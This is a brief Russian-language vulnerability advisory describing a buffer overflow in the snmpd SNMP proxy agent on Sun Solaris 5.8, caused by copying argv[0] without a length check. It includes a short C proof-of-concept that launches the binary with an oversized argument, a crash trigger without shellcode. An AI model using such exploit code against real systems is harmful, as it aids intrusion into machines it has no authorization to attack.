Команда /opt/SUNWssp/snmpd (SNMP proxy agent) содержит буферное переполнение. Баг случается, когда процесс приложения (argv[0]) скопирован во внутреннюю переменную без проверки длины.

Системы уязвимы:
Sun Solaris 5.8

Exploit:
#include <stdio.h>
void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl(«/opt/SUNWssp/bin/snmpd»,buf,(char *)0);
}

Пример бага



Оставить мнение